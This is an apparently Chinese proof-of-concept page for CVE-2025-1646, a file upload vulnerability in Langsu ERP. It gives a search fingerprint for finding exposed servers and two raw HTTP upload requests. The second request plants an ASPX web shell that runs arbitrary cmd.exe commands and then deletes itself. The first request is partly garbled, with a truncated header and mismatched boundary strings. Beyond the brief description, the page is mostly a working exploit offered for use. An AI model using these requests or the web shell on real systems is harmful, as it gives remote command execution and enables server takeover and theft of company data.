A_内功A_POC探索IIS
Source
Edit
History

【郎速ERP】CVE-2025-1646

文章目录
  1. 1. 漏洞介绍:
  2. 2. 资产指纹:
  3. 3. POC
概述

郎速ERP CVE-2025-1646 漏洞整理

[toc]

相关参考

![forthebadge](data:image/svg+xml;base64,PHN2ZyBkYXRhLXYtM2M4N2I3YjQ9IiIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMjM3LjA2MjUiIGhlaWdodD0iMzUiIHZpZXdCb3g9IjAgMCAyMzcuMDYyNSAzNSIgY2xhc3M9ImJhZGdlLXN2ZyI+PGRlZnMgZGF0YS12LTNjODdiN2I0PSIiPjwhLS0tLT48IS0tLS0+PCEtLS0tPjwvZGVmcz48cmVjdCBkYXRhLXYtM2M4N2I3YjQ9IiIgd2lkdGg9IjQ4LjQ1MzEyNSIgaGVpZ2h0PSIzNSIgZmlsbD0iI0RDMTQzQyIvPjxyZWN0IGRhdGEtdi0zYzg3YjdiND0iIiB4PSI0OC40NTMxMjUiIHdpZHRoPSIxMDEuMDYyNSIgaGVpZ2h0PSIzNSIgZmlsbD0iIzhCMDAwMCIvPjwhLS0tLT48dGV4dCBkYXRhLXYtM2M4N2I3YjQ9IiIgeD0iMjQuMjI2NTYyNSIgeT0iMTcuNSIgZHk9IjAuMzVlbSIgZm9udC1zaXplPSIxMiIgZm9udC1mYW1pbHk9IlJvYm90bywgc2Fucy1zZXJpZiIgZmlsbD0iI0ZGRkZGRiIgdGV4dC1hbmNob3I9Im1pZGRsZSIgbGV0dGVyLXNwYWNpbmc9IjIiIGZvbnQtd2VpZ2h0PSI2MDAiIGZvbnQtc3R5bGU9Im5vcm1hbCIgdGV4dC1kZWNvcmF0aW9uPSJub25lIiBmaWxsLW9wYWNpdHk9IjEiIGZvbnQtdmFyaWFudD0ibm9ybWFsIiBzdHlsZT0idGV4dC10cmFuc2Zvcm06IHVwcGVyY2FzZTsiPkNWRTwvdGV4dD48IS0tLS0+PHRleHQgZGF0YS12LTNjODdiN2I0PSIiIHg9Ijk4Ljk4NDM3NSIgeT0iMTcuNSIgZHk9IjAuMzVlbSIgZm9udC1zaXplPSIxMiIgZm9udC1mYW1pbHk9Ik1vbnRzZXJyYXQsIHNhbnMtc2VyaWYiIGZpbGw9IiNGRkZGRkYiIHRleHQtYW5jaG9yPSJtaWRkbGUiIGZvbnQtd2VpZ2h0PSI5MDAiIGxldHRlci1zcGFjaW5nPSIyIiBmb250LXN0eWxlPSJub3JtYWwiIHRleHQtZGVjb3JhdGlvbj0ibm9uZSIgZmlsbC1vcGFjaXR5PSIxIiBmb250LXZhcmlhbnQ9Im5vcm1hbCIgc3R5bGU9InRleHQtdHJhbnNmb3JtOiB1cHBlcmNhc2U7Ij4yMDI1LTE2NDc8L3RleHQ+PHJlY3QgZGF0YS12LTNjODdiN2I0PSIiIHg9IjE0OS41MTU2MjUiIHdpZHRoPSI4Ny41NDY4NzUiIGhlaWdodD0iMzUiIGZpbGw9IiNGRkQ3MDAiLz48IS0tLS0+PHRleHQgZGF0YS12LTNjODdiN2I0PSIiIHg9IjE5My4yODkwNjI1IiB5PSIxNy41IiBkeT0iMC4zNWVtIiBmb250LXNpemU9IjEyIiBmb250LWZhbWlseT0iUm9ib3RvLCBzYW5zLXNlcmlmIiBmaWxsPSIjMDAwMDAwIiB0ZXh0LWFuY2hvcj0ibWlkZGxlIiBmb250LXdlaWdodD0iNTAwIiBsZXR0ZXItc3BhY2luZz0iMiIgZm9udC1zdHlsZT0ibm9ybWFsIiB0ZXh0LWRlY29yYXRpb249Im5vbmUiIGZpbGwtb3BhY2l0eT0iMSIgZm9udC12YXJpYW50PSJub3JtYWwiIHN0eWxlPSJ0ZXh0LXRyYW5zZm9ybTogdXBwZXJjYXNlOyI+Q1JJVElDQUw8L3RleHQ+PC9zdmc+)

漏洞介绍:

郎速 ERP 是一款功能强大的企业资源计划(ERP)软件,专为中小企业量身打造,旨在帮助企业优化管理流程、提升运营效率。不仅适用于制造业,还广泛适用于零售、物流、服务等多个行业。朗速ERP后台管理系统中的FileUploadApi接口文件存在文件上传漏洞,攻击者可利用该漏洞上传恶意文件,进而控制服务器或窃取企业敏感信息。

资产指纹:

1
body="/Resource/Scripts/Yw/Yw_Bootstrap.js"

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /Api/TinyMce/UploadAjaxAPI.ashx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (K
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjEL
Accept: */*
Connection: close
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/jpeg
Test
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
POST /Api/FileUploadApi.ashx?method=DoWebUpload HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: */*
Connection: close

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/jpeg

<%@ Page Language="Jscript" validateRequest="false" %>
<%
var c=new System.Diagnostics.ProcessStartInfo("cmd");
var e=new System.Diagnostics.Process();
var out:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;
c.RedirectStandardError=true;
e.StartInfo=c;
c.Arguments="/c " + Request.Item["cmd"];
e.Start();
out=e.StandardOutput;
EI=e.StandardError;
e.Close();
Response.Write(out.ReadToEnd() + EI.ReadToEnd());
System.IO.File.Delete(Request.PhysicalPath);
Response.End();%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--